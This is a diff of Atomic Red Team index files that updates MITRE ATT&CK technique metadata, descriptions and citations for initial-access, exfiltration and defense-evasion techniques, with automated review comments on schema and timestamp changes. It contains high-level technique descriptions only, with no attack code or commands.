+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
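Review bot: `spec_version: '2.1'` is removed here with nothing replacing it, and the same key disappears from nearly every object in this diff, so this is the index generator no longer emitting the STIX `spec_version` field rather than a per-object edit; confirm that is intended and that nothing downstream reads it. The description itself only changes scalar style (double-quoted with `\n\n` escapes to a `|-` block with real blank lines) plus the new thread-hijacking sentence, whose `(Citation: phishing-krebs)` resolves to a source entry added in a later hunk of this file.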
@@ -61035,9 +61939,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -61055,7 +61959,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
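Review bot: the ACSC link now points at a web.archive.org snapshot of the same PDF while the "Retrieved October 19, 2020" date is left unchanged, which is correct for an archived copy of the original document; the new `phishing-krebs` source entry is the one the citation added to the T1566 description resolves to, so the description and reference list stay consistent.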
@@ -61093,11 +62001,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -61114,7 +62021,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -61124,7 +62030,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -61133,19 +62039,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -61193,11 +62097,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -61217,10 +62122,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
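Review bot: unlike the other platform hunks, where `Office 365`/`Google Workspace` are replaced by `Office Suite`, T1566.004 loses `SaaS` outright and only gains `Identity Provider`, leaving Linux/macOS/Windows/Identity Provider at version 1.1. If the index is regenerated verbatim from the upstream STIX bundle this is the upstream scope change for Spearphishing Voice, but it is worth confirming rather than assuming a rename, since the consumer-facing effect is a narrower platform set, not a relabelled one.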
@@ -61253,7 +62156,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -61292,7 +62194,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
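Review bot: the `modified` timestamp on T1195.002 moves backwards (2022-05-24 to 2022-04-28) with no other visible change to the object, and the same regression appears on T1200, T1029, T1011.001, T1048.001, T1048.002, T1041, T1052.001, T1030, T1052, T1048.003, T1055.011 and T1205.002 later in this diff. The old values all share synthetic-looking stamps (`14:00:00.188Z`, `14:49:39.188Z`), so the new ones are most likely the objects' real upstream timestamps, but anything that uses `modified` to detect changed techniques will now see these as older than previously recorded; confirm the source bundle is the intended release.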
@@ -61307,7 +62209,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -61387,11 +62288,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -61447,11 +62347,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -61512,8 +62411,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -61541,13 +62440,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -61587,8 +62485,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -61596,13 +62496,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -61633,14 +62533,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -61707,11 +62604,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -61763,15 +62659,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -61795,10 +62690,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -61817,13 +62711,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -61862,9 +62755,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -61914,7 +62806,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -61934,7 +62825,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -61954,8 +62845,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
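Review bot: on T1029 `x_mitre_attack_spec_version: 2.1.0` is removed outright rather than bumped to 3.2.0 as on the other objects, so this technique ends up with no attack spec version key at all; the same happens to T1011.001, T1048.001, T1048.002, T1052.001, T1030, T1052 and T1055.011, while T1195.002 keeps its `x_mitre_attack_spec_version: 2.1.0` as context. If the generator is expected to surface this field consistently, the inconsistency should be explained in the commit message, and any consumer reading it needs to tolerate its absence.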
@@ -62002,7 +62891,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -62022,7 +62910,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -62044,8 +62932,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -62099,7 +62985,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -62124,7 +63009,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -62159,12 +63044,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -62189,11 +63072,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
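Review bot: `x_mitre_network_requirements: false` is dropped from T1020.001 alongside the 1.2 -> 1.3 bump, and the same key is removed from T1048 in a later hunk; since that is the only content change visible for this object, it is a schema-level removal worth calling out in the commit message so that any consumer keyed on that field is not surprised by it vanishing.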
@@ -62236,9 +63118,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -62285,7 +63166,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -62311,7 +63191,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -62344,13 +63224,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -62399,12 +63277,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -62440,12 +63317,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -62454,7 +63330,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -62478,9 +63353,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -62503,7 +63377,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -62525,8 +63399,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -62577,7 +63449,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -62627,7 +63498,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -62652,7 +63522,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -62675,13 +63545,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -62722,9 +63590,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -62772,7 +63639,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -62794,7 +63660,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -62818,12 +63684,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -62887,6 +63751,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/containers-index.yaml b/atomics/Indexes/containers-index.yaml
index 1ecd5e12c3..3abf1f8c40 100644
--- a/atomics/Indexes/containers-index.yaml
+++ b/atomics/Indexes/containers-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
